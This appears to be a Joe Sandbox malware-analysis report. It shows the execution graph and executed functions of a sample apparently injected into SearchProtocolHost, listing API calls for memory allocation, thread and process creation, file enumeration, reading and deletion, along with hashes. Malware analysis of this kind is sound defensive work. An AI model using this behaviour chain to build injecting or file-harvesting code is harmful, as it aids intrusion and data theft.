                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:4%
                                                                                      Dynamic/Decrypted Code Coverage:16.4%
                                                                                      Signature Coverage:8.1%
                                                                                      Total number of Nodes:657
                                                                                      Total number of Limit Nodes:77
                                                                                      execution_graph 61378 378c170 439 API calls 61278 37baf72 316 API calls 61279 37ba370 200 API calls 60803 2daeec0 60804 2daeedd 60803->60804 60807 2da3ec0 60804->60807 60806 2daeefb 60808 2da3ee4 60807->60808 60809 2da3f20 LdrLoadDll 60808->60809 60810 2da3eeb 60808->60810 60809->60810 60810->60806 60811 2da06c0 60812 2da06da 60811->60812 60813 2da3ec0 LdrLoadDll 60812->60813 60814 2da06f8 60813->60814 60815 2da073d 60814->60815 60816 2da072c PostThreadMessageW 60814->60816 60816->60815 60996 2db7ec0 60997 2db6d80 RtlFreeHeap 60996->60997 60998 2db7ed5 60997->60998 61004 2d9b2c5 NtAllocateVirtualMemory 61382 37c7960 300 API calls 61383 37c415f 298 API calls 61281 37cbb5b 299 API calls 61385 379b950 515 API calls 61076 2db4cf0 61077 2db4d67 61076->61077 61079 2db4d0e 61076->61079 61078 2db4d7d NtCreateFile 61077->61078 61283 37ca350 380 API calls 61386 37c8d4f 323 API calls 61285 378a740 385 API calls 61387 378c140 305 API calls 61286 37b4f42 323 API calls 61260 2db4ee0 61261 2db4f01 61260->61261 61262 2db4f32 61260->61262 61263 2db4f48 NtDeleteFile 61262->61263 61389 37ae547 468 API calls 61290 3811fc9 500 API calls 61390 3789d30 297 API calls 61392 37ca130 14 API calls 61393 37c9d2c 432 API calls 61294 2da028f RtlFreeHeap 61295 378bf20 321 API calls 61296 37cab20 309 API calls 61297 37ccb20 306 API calls 61396 37c8520 14 API calls 61298 3836bde 479 API calls 61299 37c8322 462 API calls 61005 2da22b8 61006 2da22d8 61005->61006 61007 2da59c0 2 API calls 61006->61007 61008 2da22e3 61007->61008 61301 37bc310 301 API calls 61303 37bcb10 GetPEB GetPEB GetPEB GetPEB 61106 2dae2ac CoInitialize 61264 2db04a0 61265 2db04bc 61264->61265 61266 2db04f8 61265->61266 61267 2db04e4 61265->61267 61269 2db4f60 NtClose 61266->61269 61268 2db4f60 NtClose 61267->61268 61270 2db04ed 61268->61270 61271 2db0501 61269->61271 61272 2db6ea0 RtlAllocateHeap 61271->61272 61273 2db050c 61272->61273 61401 37c5900 300 API calls 61304 3791ffa LdrInitializeThunk 61305 37873f0 12 API calls 61306 3787bf0 306 API calls 61307 381330c 298 API calls 61308 3849313 15 API calls 60851 2da9c40 60856 2da9970 60851->60856 60853 2da9c4d 60870 2da9610 60853->60870 60855 2da9c53 60857 2da9995 60856->60857 60881 2da7390 60857->60881 60860 2da9ad2 60860->60853 60862 2da9ae9 60862->60853 60863 2da9ae0 60863->60862 60865 2da9bd1 60863->60865 60894 2da9070 60863->60894 60867 2da9c29 60865->60867 60903 2da93d0 60865->60903 60868 2db6d80 RtlFreeHeap 60867->60868 60869 2da9c30 60868->60869 60869->60853 60871 2da9626 60870->60871 60878 2da9631 60870->60878 60872 2db6e60 RtlAllocateHeap 60871->60872 60872->60878 60873 2da9647 60873->60855 60874 2da7390 GetFileAttributesW 60874->60878 60875 2da993e 60876 2da9957 60875->60876 60877 2db6d80 RtlFreeHeap 60875->60877 60876->60855 60877->60876 60878->60873 60878->60874 60878->60875 60879 2da9070 2 API calls 60878->60879 60880 2da93d0 RtlFreeHeap 60878->60880 60879->60878 60880->60878 60882 2da73b1 60881->60882 60883 2da73b8 GetFileAttributesW 60882->60883 60884 2da73c3 60882->60884 60883->60884 60884->60860 60885 2db1af0 60884->60885 60886 2db1afe 60885->60886 60887 2db1b05 60885->60887 60886->60863 60888 2da3ec0 LdrLoadDll 60887->60888 60889 2db1b3a 60888->60889 60890 2db6e60 RtlAllocateHeap 60889->60890 60893 2db1ce1 60889->60893 60892 2db1b62 60890->60892 60891 2db6d80 RtlFreeHeap 60891->60893 60892->60891 60892->60893 60893->60863 60895 2da9096 60894->60895 60896 2dac5e0 RtlFreeHeap 60895->60896 60897 2da90fd 60896->60897 60899 2da9280 60897->60899 60901 2da911b 60897->60901 60898 2da9265 60898->60863 60899->60898 60900 2da8f40 2 API calls 60899->60900 60900->60899 60901->60898 60907 2da8f40 60901->60907 60904 2da93f6 60903->60904 60905 2dac5e0 RtlFreeHeap 60904->60905 60906 2da9472 60905->60906 60906->60865 60908 2da8f56 60907->60908 60911 2dacae0 60908->60911 60910 2da905e 60910->60901 60912 2dacb1d 60911->60912 60913 2dacbcd 60912->60913 60915 2dacb70 60912->60915 60918 2dadbe0 60912->60918 60913->60910 60916 2dacba9 60915->60916 60917 2db6d80 RtlFreeHeap 60915->60917 60916->60910 60917->60916 60921 2dad8e0 60918->60921 60920 2dadbf4 60920->60915 60922 2dad906 60921->60922 60923 2db6cf0 NtAllocateVirtualMemory 60922->60923 60929 2dad929 60922->60929 60923->60929 60924 2dadbd1 60924->60920 60925 2dadbb3 60926 2db6d80 RtlFreeHeap 60925->60926 60928 2dadbc3 60926->60928 60928->60920 60929->60924 60929->60925 60930 2d9b2d0 60929->60930 60931 2db6cf0 NtAllocateVirtualMemory 60930->60931 60932 2d9c941 60931->60932 60932->60925 61404 37c69e0 203 API calls 61311 3789fd0 296 API calls 61019 2da6470 61020 2da649e 61019->61020 61026 2da6f70 61020->61026 61022 2da64c6 61023 2da64cd 61022->61023 61033 2db6ea0 61022->61033 61025 2da64dd 61027 2da6f8d 61026->61027 61036 2db4790 61027->61036 61029 2da6fdd 61030 2da6fe4 61029->61030 61041 2db4840 61029->61041 61030->61022 61032 2da700d 61032->61022 61034 2db5210 RtlAllocateHeap 61033->61034 61035 2db6ebd 61034->61035 61035->61025 61037 2db47fa 61036->61037 61039 2db47b1 61036->61039 61046 37d2e50 LdrInitializeThunk 61037->61046 61038 2db4833 61038->61029 61039->61029 61042 2db48b6 61041->61042 61043 2db4861 61041->61043 61047 37d2c30 LdrInitializeThunk 61042->61047 61043->61032 61044 2db48fb 61044->61032 61046->61038 61047->61044 61080 2db3c70 61081 2db3cca 61080->61081 61083 2db3cd7 61081->61083 61084 2db2210 61081->61084 61085 2db6cf0 NtAllocateVirtualMemory 61084->61085 61087 2db2251 61085->61087 61086 2db2356 61086->61083 61087->61086 61088 2da3ec0 LdrLoadDll 61087->61088 61090 2db2297 61088->61090 61089 2db22d0 Sleep 61089->61090 61090->61086 61090->61089 61314 378e3c0 375 API calls 61315 378bfc0 17 API calls 61407 37881c0 198 API calls 61408 3791dc0 23 API calls 61409 37a51c0 343 API calls 61410 37cc5c6 460 API calls 61318 37c8fbc 317 API calls 60766 2da6610 60767 2da662c 60766->60767 60768 2da6647 60766->60768 60767->60768 60769 2db4f60 NtClose 60767->60769 60769->60768 61414 37cb9b0 17 API calls 61322 2db2205 LdrLoadDll Sleep NtAllocateVirtualMemory 61010 2da2c3c 61011 2da6dd0 2 API calls 61010->61011 61012 2da2c4c 61011->61012 61013 2da2c61 61012->61013 61014 2db4f60 NtClose 61012->61014 61014->61013 61091 2db0830 61096 2db083f 61091->61096 61092 2db08cc 61093 2db0886 61094 2db6d80 RtlFreeHeap 61093->61094 61095 2db0896 61094->61095 61096->61092 61096->61093 61097 2db08c7 61096->61097 61098 2db6d80 RtlFreeHeap 61097->61098 61098->61092 61324 37c9790 377 API calls 61416 3788196 14 API calls 61418 3794180 438 API calls 61419 37c9580 426 API calls 60802 2da93cc RtlFreeHeap 61332 378b260 315 API calls 61422 3787860 199 API calls 60817 2daf7c0 60818 2daf7e8 60817->60818 60830 2da59c0 60818->60830 60820 2daf84f 60821 2daf848 60821->60820 60837 2da5ad0 60821->60837 60823 2daf8e4 60824 2da5ad0 LdrInitializeThunk 60823->60824 60829 2dafa96 60823->60829 60825 2daf97b 60824->60825 60826 2da5ad0 LdrInitializeThunk 60825->60826 60825->60829 60827 2daf9f1 60826->60827 60828 2da5ad0 LdrInitializeThunk 60827->60828 60827->60829 60828->60829 60831 2da59f3 60830->60831 60832 2da5a17 60831->60832 60841 2db4b60 60831->60841 60832->60821 60834 2da5a3a 60834->60832 60835 2db4f60 NtClose 60834->60835 60836 2da5aba 60835->60836 60836->60821 60838 2da5af5 60837->60838 60846 2db4950 60838->60846 60842 2db4b7d 60841->60842 60845 37d2bc0 LdrInitializeThunk 60842->60845 60843 2db4ba9 60843->60834 60845->60843 60847 2db496d 60846->60847 60850 37d2b80 LdrInitializeThunk 60847->60850 60848 2da5b69 60848->60823 60850->60848 60933 2dab1c0 60934 2dab1e8 60933->60934 60935 2db6e60 RtlAllocateHeap 60934->60935 60937 2dab248 60935->60937 60936 2dab251 60937->60936 60944 2daa520 60937->60944 60939 2dab27a 60940 2daa520 3 API calls 60939->60940 60942 2dab2ff 60940->60942 60941 2db6d80 RtlFreeHeap 60943 2dab362 60941->60943 60942->60941 60945 2daa5b8 60944->60945 60946 2da5ad0 LdrInitializeThunk 60945->60946 60947 2daa6cf 60946->60947 60953 2daa819 60947->60953 60966 2db4a00 60947->60966 60950 2daa80f 60951 2db4f60 NtClose 60950->60951 60951->60953 60952 2daa708 60954 2db4f60 NtClose 60952->60954 60953->60939 60955 2daa742 60954->60955 60955->60953 60956 2da5ad0 LdrInitializeThunk 60955->60956 60957 2daa7a1 60956->60957 60957->60953 60958 2db4a00 LdrInitializeThunk 60957->60958 60959 2daa7c6 60958->60959 60960 2daa7f9 60959->60960 60961 2daa7cd 60959->60961 60963 2db4f60 NtClose 60960->60963 60962 2db4f60 NtClose 60961->60962 60965 2daa7d7 60962->60965 60964 2daa803 60963->60964 60964->60939 60965->60939 60967 2db4a1d 60966->60967 60970 37d2b00 LdrInitializeThunk 60967->60970 60968 2daa6fd 60968->60950 60968->60952 60970->60968 60999 2db4dc0 61000 2db4dda 60999->61000 61003 37d2a10 LdrInitializeThunk 61000->61003 61001 2db4e16 61003->61001 61335 3812e9f 346 API calls 61337 2db03f2 NtClose LdrInitializeThunk 61424 37ac850 435 API calls 61048 2dafff1 61060 2db4e20 61048->61060 61050 2db0012 61051 2db0030 61050->61051 61052 2db0045 61050->61052 61053 2db4f60 NtClose 61051->61053 61054 2db4f60 NtClose 61052->61054 61055 2db0039 61053->61055 61057 2db004e 61054->61057 61056 2db007a 61057->61056 61058 2db6d80 RtlFreeHeap 61057->61058 61059 2db006e 61058->61059 61061 2db4e8f 61060->61061 61063 2db4e3e 61060->61063 61062 2db4ea5 NtReadFile 61061->61062 61062->61050 61063->61050 61339 3793640 13 API calls 61108 2da67e0 61109 2da6852 61108->61109 61110 2da67f8 61108->61110 61110->61109 61112 2daa120 61110->61112 61113 2daa146 61112->61113 61119 2daa513 61113->61119 61155 2db52f0 61113->61155 61115 2daa1eb 61116 2daa4fb 61115->61116 61118 2db7f90 2 API calls 61115->61118 61117 2db6d80 RtlFreeHeap 61116->61117 61117->61119 61120 2daa20a 61118->61120 61119->61109 61120->61116 61121 2daa313 61120->61121 61122 2db46a0 LdrInitializeThunk 61120->61122 61161 2da51e0 61121->61161 61123 2daa291 61122->61123 61123->61121 61128 2daa299 61123->61128 61126 2db6d80 RtlFreeHeap 61130 2daa309 61126->61130 61127 2daa2c8 61133 2db4f60 NtClose 61127->61133 61128->61119 61128->61127 61134 2daa2d8 61128->61134 61158 2da50d0 61128->61158 61129 2daa373 61135 2daa4da 61129->61135 61136 2daa3a3 61129->61136 61130->61109 61132 2da50d0 LdrInitializeThunk 61132->61129 61133->61134 61134->61126 61138 2db6d80 RtlFreeHeap 61135->61138 61166 2db4ff0 61136->61166 61139 2daa4f1 61138->61139 61139->61109 61140 2daa3c2 61141 2da6f70 2 API calls 61140->61141 61142 2daa42b 61141->61142 61142->61116 61143 2daa436 61142->61143 61144 2db6d80 RtlFreeHeap 61143->61144 61145 2daa45a 61144->61145 61171 2db4900 61145->61171 61148 2db4840 LdrInitializeThunk 61149 2daa495 61148->61149 61150 2daa49c 61149->61150 61151 2db4900 LdrInitializeThunk 61149->61151 61150->61109 61152 2daa4c2 61151->61152 61175 2db44b0 61152->61175 61154 2daa4d0 61154->61109 61156 2db530a 61155->61156 61157 2db531b CreateProcessInternalW 61156->61157 61157->61115 61159 2db4840 LdrInitializeThunk 61158->61159 61160 2da510e 61159->61160 61160->61127 61162 2db46a0 LdrInitializeThunk 61161->61162 61163 2da5216 61162->61163 61164 2db4ff0 LdrInitializeThunk 61163->61164 61165 2da522b 61164->61165 61165->61116 61165->61129 61165->61132 61167 2db504f 61166->61167 61169 2db500e 61166->61169 61180 37d2da0 LdrInitializeThunk 61167->61180 61168 2db5080 61168->61140 61169->61140 61172 2db491d 61171->61172 61181 37d2c50 LdrInitializeThunk 61172->61181 61173 2daa46e 61173->61148 61176 2db4506 61175->61176 61177 2db44d1 61175->61177 61182 37d2ed0 LdrInitializeThunk 61176->61182 61177->61154 61178 2db452b 61178->61154 61180->61168 61181->61173 61182->61178 61183 2dae5e0 61184 2dae644 61183->61184 61185 2da59c0 2 API calls 61184->61185 61187 2dae76d 61185->61187 61186 2dae774 61187->61186 61188 2da5ad0 LdrInitializeThunk 61187->61188 61190 2dae7f0 61188->61190 61189 2dae913 61190->61189 61191 2dae922 61190->61191 61212 2dae3c0 61190->61212 61192 2db4f60 NtClose 61191->61192 61194 2dae92c 61192->61194 61195 2dae825 61195->61191 61196 2dae830 61195->61196 61197 2db6e60 RtlAllocateHeap 61196->61197 61198 2dae859 61197->61198 61199 2dae878 61198->61199 61200 2dae862 61198->61200 61221 2dae2b0 CoInitialize 61199->61221 61201 2db4f60 NtClose 61200->61201 61203 2dae86c 61201->61203 61204 2dae886 61223 2db4ac0 61204->61223 61206 2dae902 61207 2db4f60 NtClose 61206->61207 61208 2dae90c 61207->61208 61209 2db6d80 RtlFreeHeap 61208->61209 61209->61189 61210 2dae8a4 61210->61206 61211 2db4ac0 LdrInitializeThunk 61210->61211 61211->61210 61213 2dae3dc 61212->61213 61214 2da3ec0 LdrLoadDll 61213->61214 61216 2dae3fa 61214->61216 61215 2dae403 61215->61195 61216->61215 61217 2da3ec0 LdrLoadDll 61216->61217 61218 2dae4ce 61217->61218 61219 2da3ec0 LdrLoadDll 61218->61219 61220 2dae528 61218->61220 61219->61220 61220->61195 61222 2dae315 61221->61222 61222->61204 61224 2db4ada 61223->61224 61227 37d2ac0 LdrInitializeThunk 61224->61227 61225 2db4b0a 61225->61210 61227->61225 61340 37bea40 323 API calls 61425 37bb839 15 API calls 61341 3787a30 307 API calls 60603 2d99990 60605 2d99e38 60603->60605 60604 2d9a2f2 60605->60604 60607 2db69f0 60605->60607 60608 2db6a16 60607->60608 60613 2da2df0 60608->60613 60610 2db6a35 60611 2db6a63 60610->60611 60616 2db32b0 60610->60616 60611->60604 60620 2da2d40 60613->60620 60615 2da2dfd 60615->60610 60617 2db330a 60616->60617 60618 2db3317 60617->60618 60644 2da1cb0 60617->60644 60618->60611 60621 2da2d57 60620->60621 60623 2da2d70 60621->60623 60624 2db58e0 60621->60624 60623->60615 60626 2db58f8 60624->60626 60625 2db591c 60625->60623 60626->60625 60631 2db46a0 60626->60631 60632 2db46ba 60631->60632 60638 37d2b2a 60632->60638 60633 2db46e6 60635 2db6d80 60633->60635 60641 2db5260 60635->60641 60637 2db598a 60637->60623 60639 37d2b3f LdrInitializeThunk 60638->60639 60640 37d2b31 60638->60640 60639->60633 60640->60633 60642 2db527a 60641->60642 60643 2db528b RtlFreeHeap 60642->60643 60643->60637 60645 2da1ce8 60644->60645 60656 2da6ee0 60645->60656 60647 2da1cf0 60648 2da1f49 60647->60648 60666 2db6e60 60647->60666 60648->60618 60650 2da1d06 60651 2db6e60 RtlAllocateHeap 60650->60651 60652 2da1d17 60651->60652 60653 2db6e60 RtlAllocateHeap 60652->60653 60654 2da1d28 60653->60654 60669 2da17b0 60654->60669 60657 2da6f0c 60656->60657 60688 2da6dd0 60657->60688 60660 2da6f39 60662 2da6f44 60660->60662 60694 2db4f60 60660->60694 60661 2da6f51 60663 2da6f62 60661->60663 60665 2db4f60 NtClose 60661->60665 60662->60647 60663->60647 60665->60663 60702 2db5210 60666->60702 60668 2db6e7b 60668->60650 60705 2da71a0 60669->60705 60671 2da17ca 60681 2da1c98 60671->60681 60709 2dafe30 60671->60709 60674 2da19d1 60717 2db7f90 60674->60717 60676 2da1828 60676->60681 60712 2db7e60 60676->60712 60677 2da19e6 60684 2da19fc 60677->60684 60723 2d9ff90 60677->60723 60678 2d9ff90 3 API calls 60678->60684 60681->60648 60682 2da1ab3 60682->60684 60736 2da0250 60682->60736 60684->60678 60684->60681 60686 2da0250 LdrInitializeThunk 60684->60686 60739 2da7140 60684->60739 60685 2da7140 LdrInitializeThunk 60687 2da1b2a 60685->60687 60686->60684 60687->60684 60687->60685 60689 2da6ec6 60688->60689 60690 2da6dea 60688->60690 60689->60660 60689->60661 60697 2db4740 60690->60697 60693 2db4f60 NtClose 60693->60689 60695 2db4f7a 60694->60695 60696 2db4f8b NtClose 60695->60696 60696->60662 60698 2db475a 60697->60698 60701 37d34e0 LdrInitializeThunk 60698->60701 60699 2da6eba 60699->60693 60701->60699 60703 2db522a 60702->60703 60704 2db523b RtlAllocateHeap 60703->60704 60704->60668 60706 2da71ad 60705->60706 60707 2da71ce SetErrorMode 60706->60707 60708 2da71d5 60706->60708 60707->60708 60708->60671 60743 2db6cf0 60709->60743 60711 2dafe51 60711->60676 60713 2db7e70 60712->60713 60714 2db7e76 60712->60714 60713->60674 60715 2db6e60 RtlAllocateHeap 60714->60715 60716 2db7e9c 60715->60716 60716->60674 60718 2db7f00 60717->60718 60719 2db7f5d 60718->60719 60720 2db6e60 RtlAllocateHeap 60718->60720 60719->60677 60721 2db7f3a 60720->60721 60722 2db6d80 RtlFreeHeap 60721->60722 60722->60719 60724 2d9ff9b 60723->60724 60725 2d9ffa0 60723->60725 60724->60682 60726 2db6cf0 NtAllocateVirtualMemory 60725->60726 60733 2d9ffc5 60726->60733 60727 2da002c 60727->60682 60729 2da0032 60730 2da005c 60729->60730 60732 2db5180 LdrInitializeThunk 60729->60732 60730->60682 60734 2da004d 60732->60734 60733->60727 60733->60729 60735 2db6cf0 NtAllocateVirtualMemory 60733->60735 60750 2db4650 60733->60750 60754 2db5180 60733->60754 60734->60682 60735->60733 60737 2db5180 LdrInitializeThunk 60736->60737 60738 2da0272 60737->60738 60738->60687 60740 2da7153 60739->60740 60760 2db45d0 60740->60760 60742 2da717e 60742->60684 60746 2db5090 60743->60746 60745 2db6d21 60745->60711 60747 2db50f3 60746->60747 60749 2db50ae 60746->60749 60748 2db5109 NtAllocateVirtualMemory 60747->60748 60748->60745 60749->60745 60751 2db466d 60750->60751 60758 37d2d10 LdrInitializeThunk 60751->60758 60752 2db4695 60752->60733 60755 2db519a 60754->60755 60759 37d2b90 LdrInitializeThunk 60755->60759 60756 2db51c2 60756->60733 60758->60752 60759->60756 60761 2db45ee 60760->60761 60762 2db4623 60760->60762 60761->60742 60765 37d2cf0 LdrInitializeThunk 60762->60765 60763 2db4648 60763->60742 60765->60763 61346 37c7a33 573 API calls 61427 378b420 203 API calls 61428 3792022 209 API calls 61350 378821b 318 API calls 61009 2dae3bc LdrLoadDll 61351 3789610 409 API calls 61429 3792410 449 API calls 61430 3799810 550 API calls 61064 2db43b0 61065 2db43bf 61064->61065 61066 2db43ce 61065->61066 61069 37d4260 LdrInitializeThunk 61065->61069 61067 2db4428 61069->61067 61431 378ec0b 443 API calls 61432 378640d 462 API calls 61107 2db43ac LdrInitializeThunk 61355 37bd600 557 API calls 61356 382d60a 329 API calls 60770 2da5150 60771 2da7140 LdrInitializeThunk 60770->60771 60772 2da5180 60771->60772 60774 2da51ac 60772->60774 60775 2da70c0 60772->60775 60776 2da7104 60775->60776 60781 2da7125 60776->60781 60782 2db4430 60776->60782 60778 2da7115 60779 2da7131 60778->60779 60780 2db4f60 NtClose 60778->60780 60779->60772 60780->60781 60781->60772 60783 2db4486 60782->60783 60785 2db4451 60782->60785 60787 37d4570 LdrInitializeThunk 60783->60787 60784 2db44ab 60784->60778 60785->60778 60787->60784 61433 37bacf0 305 API calls 61434 37bccf0 GetPEB GetPEB 61357 37c62f0 461 API calls 61359 37c76ed 303 API calls 61360 37872e0 295 API calls 61437 37958e0 645 API calls 60971 2dae940 60974 2dad5c0 60971->60974 60975 2dad5e6 60974->60975 60976 2da7390 GetFileAttributesW 60975->60976 60977 2dad761 60976->60977 60978 2dad768 60977->60978 60980 2dad2a0 60977->60980 60981 2dad2c3 60980->60981 60982 2db1af0 3 API calls 60981->60982 60984 2dad2d0 60982->60984 60983 2dad325 60983->60977 60984->60983 60985 2dad2ef 60984->60985 60991 2dad331 60984->60991 60986 2dad2f7 60985->60986 60987 2dad314 60985->60987 60988 2db6d80 RtlFreeHeap 60986->60988 60989 2db6d80 RtlFreeHeap 60987->60989 60990 2dad308 60988->60990 60989->60983 60990->60977 60992 2dac5e0 RtlFreeHeap 60991->60992 60995 2dad375 60992->60995 60993 2db6d80 RtlFreeHeap 60994 2dad583 60993->60994 60994->60977 60995->60993 61361 37b66e0 396 API calls 61363 3799ae4 402 API calls 61440 37bf4d0 308 API calls 61442 378b0c0 382 API calls 61364 3793ec0 398 API calls 61228 2dac160 61229 2dac182 61228->61229 61253 2dac020 61229->61253 61232 2dac020 3 API calls 61233 2dac422 61232->61233 61234 2dac020 3 API calls 61233->61234 61235 2dac43a 61234->61235 61236 2dac020 3 API calls 61235->61236 61237 2dac452 61236->61237 61238 2dac020 3 API calls 61237->61238 61239 2dac46d 61238->61239 61240 2dac020 3 API calls 61239->61240 61242 2dac485 61240->61242 61241 2dac49f 61242->61241 61243 2dac020 3 API calls 61242->61243 61244 2dac4d3 61243->61244 61245 2dac020 3 API calls 61244->61245 61246 2dac510 61245->61246 61247 2dac020 3 API calls 61246->61247 61248 2dac54d 61247->61248 61249 2dac020 3 API calls 61248->61249 61250 2dac58a 61249->61250 61251 2dac020 3 API calls 61250->61251 61252 2dac5c7 61251->61252 61255 2dac049 61253->61255 61254 2dac14d 61254->61232 61255->61254 61256 2dac0f3 FindFirstFileW 61255->61256 61256->61254 61258 2dac10e 61256->61258 61257 2dac134 FindNextFileW 61257->61258 61259 2dac146 FindClose 61257->61259 61258->61257 61259->61254 61365 37c32c0 301 API calls 61443 37ca8c0 13 API calls 61444 37c6cc0 302 API calls 61366 3791eb0 21 API calls 60788 2da8911 60790 2da8920 60788->60790 60789 2da8927 60790->60789 60791 2da8a0f GetFileAttributesW 60790->60791 60792 2da8bba 60790->60792 60796 2dac5e0 60790->60796 60791->60790 60793 2da8bd3 60792->60793 60794 2db6d80 RtlFreeHeap 60792->60794 60794->60793 60798 2dac5f6 60796->60798 60797 2dac603 60797->60790 60798->60797 60799 2db6d80 RtlFreeHeap 60798->60799 60800 2dac63c 60799->60800 60800->60790 61367 378bea0 306 API calls 61368 37906a0 314 API calls 61445 37900a0 470 API calls 61446 378e0a4 317 API calls 61372 378a290 509 API calls 61373 378fe90 20 API calls 61447 378c090 301 API calls 61015 2d99930 61016 2d9993f 61015->61016 61017 2d99980 61016->61017 61018 2d9996d CreateThread 61016->61018 61374 379c690 GetPEB 61070 2db4330 61071 2db4383 61070->61071 61072 2db434e 61070->61072 61075 37d38d0 LdrInitializeThunk 61071->61075 61073 2db43a8 61075->61073 61449 37cb890 336 API calls

                                                                                      Executed Functions

                                                                                      Function 02DAC020 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 02DAC104
                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02DAC13F
                                                                                      • FindClose.KERNELBASE(00000000), ref: 02DAC14A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID:
                                                                                      • API String ID: 3541575487-0
                                                                                      • Opcode ID: 09787ccadf1e063e03c2a338d6c6c0ff02a4b0c240061e834ff56549c24e52a0
                                                                                      • Instruction ID: a74a6e14f9cf81df537b02f999820d51edb061e570d2da65b780cf64c3c8cc0e
                                                                                      • Opcode Fuzzy Hash: 09787ccadf1e063e03c2a338d6c6c0ff02a4b0c240061e834ff56549c24e52a0
                                                                                      • Instruction Fuzzy Hash: 943192B1600208BBEB20EF64CC85FEF777DEF54759F144459B509A6280DB70AE85CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02DB4CF0 Relevance: 1.6, APIs: 1, Instructions: 87filenativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02DB4DAE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 48a2d5c0d9baaec19eb4391d944b8839d7e61867b67e2b325b44252245e4c306
                                                                                      • Instruction ID: bfd19e977789c79dab25d712b4a9c0869e13317ce687c709a35e3ae5686d32c4
                                                                                      • Opcode Fuzzy Hash: 48a2d5c0d9baaec19eb4391d944b8839d7e61867b67e2b325b44252245e4c306
                                                                                      • Instruction Fuzzy Hash: 6F219DB2210549BBDB54DE99DC90EEB73AEEF8C754F108208FA5D97244D630EC51CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02DB4E20 Relevance: 1.6, APIs: 1, Instructions: 79filenativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02DB4ECE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: 48a771d879941eeb3c9e92751a85959e64d1bd68007c7e994aed96b2676d3dba
                                                                                      • Instruction ID: bd362fc04d0a2de8961575bb06ae986fa2bcb59a38748a854f38627f8dadce09
                                                                                      • Opcode Fuzzy Hash: 48a771d879941eeb3c9e92751a85959e64d1bd68007c7e994aed96b2676d3dba
                                                                                      • Instruction Fuzzy Hash: B021D0B2200149AFDB04DE99DC80EEB73AEEF8D714F008209FA1DA7241D630AC118BB4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02DB5090 Relevance: 1.6, APIs: 1, Instructions: 67memorynativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtAllocateVirtualMemory.NTDLL(02DA1828,?,02DA1F49,00000000,00000004,00003000,00000004,00000000,02DA1F49,?,02DA1828,02DA1F49,?), ref: 02DB5126
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateMemoryVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2167126740-0
                                                                                      • Opcode ID: ac2dac4fe1bf38f14005ee0cbbc6b957ab02f6000370c02d97857d4059162476
                                                                                      • Instruction ID: b36cb84d7400a3d9928c027ad73f0bb9cb2a694b1222453b0fd6ab6fede65cc2
                                                                                      • Opcode Fuzzy Hash: ac2dac4fe1bf38f14005ee0cbbc6b957ab02f6000370c02d97857d4059162476
                                                                                      • Instruction Fuzzy Hash: 461104B2200649ABDB10DE99DC80EEB73ADEF89710F008509FA5997240D630AC11CBB5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02DB4EE0 Relevance: 1.5, APIs: 1, Instructions: 47filenativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
                                                                                      • API String ID: 4033686569-0
                                                                                      • Opcode ID: b31cb9b57c14b65b8104b11016f728e859331c2066ba905329b858184d5dfd44
                                                                                      • Instruction ID: c5290a9af76561f661c29922c1dc0ad73c35c9fd92991ab4dfcf512ea599fafe
                                                                                      • Opcode Fuzzy Hash: b31cb9b57c14b65b8104b11016f728e859331c2066ba905329b858184d5dfd44
                                                                                      • Instruction Fuzzy Hash: A0018171201244BBD611E665DC44FEBB79DEFCAB14F408409FA4D5B241DB31BD118BB5
